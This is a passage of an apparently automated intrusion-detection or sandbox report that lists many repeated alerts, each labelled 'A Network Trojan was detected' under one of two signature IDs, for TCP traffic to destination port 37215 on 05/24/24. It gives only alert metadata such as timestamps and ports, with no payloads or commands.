              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118187
              SID:2829579
              Source Port:37284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372476
              SID:2835222
              Source Port:42668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692460
              SID:2835222
              Source Port:49420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629579
              SID:2829579
              Source Port:53556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420424
              SID:2829579
              Source Port:44752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362078
              SID:2829579
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574687
              SID:2829579
              Source Port:54056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152958
              SID:2835222
              Source Port:35802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380305
              SID:2829579
              Source Port:46464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115332
              SID:2829579
              Source Port:58990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480826
              SID:2835222
              Source Port:57744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099704
              SID:2835222
              Source Port:44498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769210
              SID:2835222
              Source Port:47260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548218
              SID:2835222
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764891
              SID:2829579
              Source Port:49184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456832
              SID:2829579
              Source Port:32924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494429
              SID:2829579
              Source Port:52104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861928
              SID:2829579
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538044
              SID:2835222
              Source Port:49310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870744
              SID:2835222
              Source Port:35018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120711
              SID:2829579
              Source Port:59180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188831
              SID:2829579
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203264
              SID:2835222
              Source Port:50524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459872
              SID:2835222
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623335
              SID:2829579
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573890
              SID:2829579
              Source Port:42878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289256
              SID:2835222
              Source Port:45794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544271
              SID:2835222
              Source Port:42102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880353
              SID:2835222
              Source Port:33750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765033
              SID:2835222
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2835222
              Source Port:39054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347704
              SID:2835222
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102486
              SID:2829579
              Source Port:35074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433527
              SID:2829579
              Source Port:60514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065803
              SID:2835222
              Source Port:34638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575271
              SID:2829579
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457136
              SID:2829579
              Source Port:39918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377454
              SID:2829579
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671474
              SID:2829579
              Source Port:53022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112022
              SID:2835222
              Source Port:39492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202533
              SID:2835222
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535414
              SID:2835222
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693198
              SID:2835222
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286890
              SID:2829579
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764885
              SID:2835222
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060947
              SID:2835222
              Source Port:32860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552323
              SID:2829579
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396618
              SID:2835222
              Source Port:41258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125387
              SID:2835222
              Source Port:34116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234711
              SID:2835222
              Source Port:54668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395513
              SID:2835222
              Source Port:40080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194047
              SID:2829579
              Source Port:60728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481671
              SID:2835222
              Source Port:36436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459735
              SID:2835222
              Source Port:38270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329720
              SID:2829579
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404379
              SID:2835222
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394383
              SID:2829579
              Source Port:36008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396213
              SID:2835222
              Source Port:54614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067546
              SID:2829579
              Source Port:37226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254197
              SID:2835222
              Source Port:57760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433623
              SID:2829579
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661285
              SID:2835222
              Source Port:35002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661361
              SID:2829579
              Source Port:56416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332229
              SID:2829579
              Source Port:33650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502735
              SID:2835222
              Source Port:59622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096762
              SID:2835222
              Source Port:54192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341573
              SID:2835222
              Source Port:54372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452640
              SID:2835222
              Source Port:46444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303269
              SID:2829579
              Source Port:52254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608773
              SID:2835222
              Source Port:47830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583903
              SID:2829579
              Source Port:46744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395604
              SID:2835222
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103584
              SID:2835222
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663376
              SID:2829579
              Source Port:50882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343466
              SID:2829579
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160440
              SID:2829579
              Source Port:42312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153258
              SID:2835222
              Source Port:55674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994196
              SID:2835222
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432131
              SID:2835222
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486147
              SID:2829579
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102199
              SID:2835222
              Source Port:60616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858987
              SID:2835222
              Source Port:36292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230966
              SID:2829579
              Source Port:54702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631773
              SID:2835222
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802624
              SID:2829579
              Source Port:58012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583806
              SID:2835222
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536469
              SID:2829579
              Source Port:53822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575220
              SID:2835222
              Source Port:58822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526813
              SID:2835222
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061765
              SID:2835222
              Source Port:45042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329680
              SID:2835222
              Source Port:40652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821853
              SID:2835222
              Source Port:33896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364381
              SID:2835222
              Source Port:56502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394624
              SID:2829579
              Source Port:45876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055588
              SID:2835222
              Source Port:57178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404613
              SID:2829579
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150721
              SID:2829579
              Source Port:59070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763948
              SID:2835222
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801649
              SID:2829579
              Source Port:60524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606138
              SID:2835222
              Source Port:60596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394106
              SID:2835222
              Source Port:50060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447950
              SID:2835222
              Source Port:54270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663551
              SID:2829579
              Source Port:57860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423341
              SID:2829579
              Source Port:57680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078139
              SID:2829579
              Source Port:38216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802925
              SID:2829579
              Source Port:33182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334220
              SID:2835222
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055558
              SID:2835222
              Source Port:45546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697043
              SID:2835222
              Source Port:60394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573324
              SID:2829579
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348079
              SID:2835222
              Source Port:51534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368998
              SID:2829579
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484623
              SID:2829579
              Source Port:42942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404554
              SID:2829579
              Source Port:45794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398435
              SID:2835222
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574389
              SID:2835222
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457650
              SID:2829579
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.541105
              SID:2829579
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451260
              SID:2829579
              Source Port:48112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544196
              SID:2835222
              Source Port:40254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443658
              SID:2835222
              Source Port:51640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535096
              SID:2829579
              Source Port:42736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624080
              SID:2835222
              Source Port:34860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456421
              SID:2829579
              Source Port:38108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480760
              SID:2835222
              Source Port:49658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638872
              SID:2829579
              Source Port:35350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150524
              SID:2835222
              Source Port:45112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684828
              SID:2835222
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724598
              SID:2829579
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207159
              SID:2829579
              Source Port:55554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568187
              SID:2829579
              Source Port:47040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459572
              SID:2835222
              Source Port:49654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402179
              SID:2835222
              Source Port:40114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111808
              SID:2835222
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374565
              SID:2829579
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482222
              SID:2829579
              Source Port:36606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965895
              SID:2835222
              Source Port:56960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639299
              SID:2835222
              Source Port:44520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152975
              SID:2835222
              Source Port:48672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.419009
              SID:2835222
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110940
              SID:2835222
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101433
              SID:2829579
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594891
              SID:2835222
              Source Port:59660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115984
              SID:2835222
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062215
              SID:2835222
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398457
              SID:2835222
              Source Port:43098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625221
              SID:2835222
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100698
              SID:2829579
              Source Port:33564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098135
              SID:2829579
              Source Port:33464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205849
              SID:2835222
              Source Port:39846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394659
              SID:2829579
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098123
              SID:2829579
              Source Port:56944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444143
              SID:2829579
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156188
              SID:2829579
              Source Port:55958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546352
              SID:2829579
              Source Port:59432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163453
              SID:2835222
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483558
              SID:2835222
              Source Port:47140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457686
              SID:2835222
              Source Port:48802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162375
              SID:2829579
              Source Port:33014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522260
              SID:2829579
              Source Port:37134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575817
              SID:2835222
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099625
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383342
              SID:2835222
              Source Port:35108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835179
              SID:2829579
              Source Port:48226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110910
              SID:2829579
              Source Port:59138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054097
              SID:2835222
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308584
              SID:2829579
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284088
              SID:2829579
              Source Port:45914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188129
              SID:2829579
              Source Port:46872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502556
              SID:2835222
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547771
              SID:2835222
              Source Port:46302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926049
              SID:2835222
              Source Port:53570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2829579
              Source Port:35570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625706
              SID:2829579
              Source Port:58198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099576
              SID:2829579
              Source Port:37324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365456
              SID:2835222
              Source Port:39818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484461
              SID:2835222
              Source Port:57764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147084
              SID:2835222
              Source Port:54646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976948
              SID:2829579
              Source Port:58026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252677
              SID:2829579
              Source Port:37962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637599
              SID:2835222
              Source Port:50864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251634
              SID:2835222
              Source Port:54398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250701
              SID:2835222
              Source Port:38410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517962
              SID:2835222
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432403
              SID:2829579
              Source Port:59642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640912
              SID:2829579
              Source Port:48622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474172
              SID:2829579
              Source Port:49452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606954
              SID:2829579
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198784
              SID:2835222
              Source Port:37880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235592
              SID:2829579
              Source Port:38292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428902
              SID:2829579
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254390
              SID:2829579
              Source Port:53318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077628
              SID:2835222
              Source Port:49910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700948
              SID:2829579
              Source Port:49880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837305
              SID:2835222
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624748
              SID:2829579
              Source Port:34766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690203
              SID:2829579
              Source Port:59440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
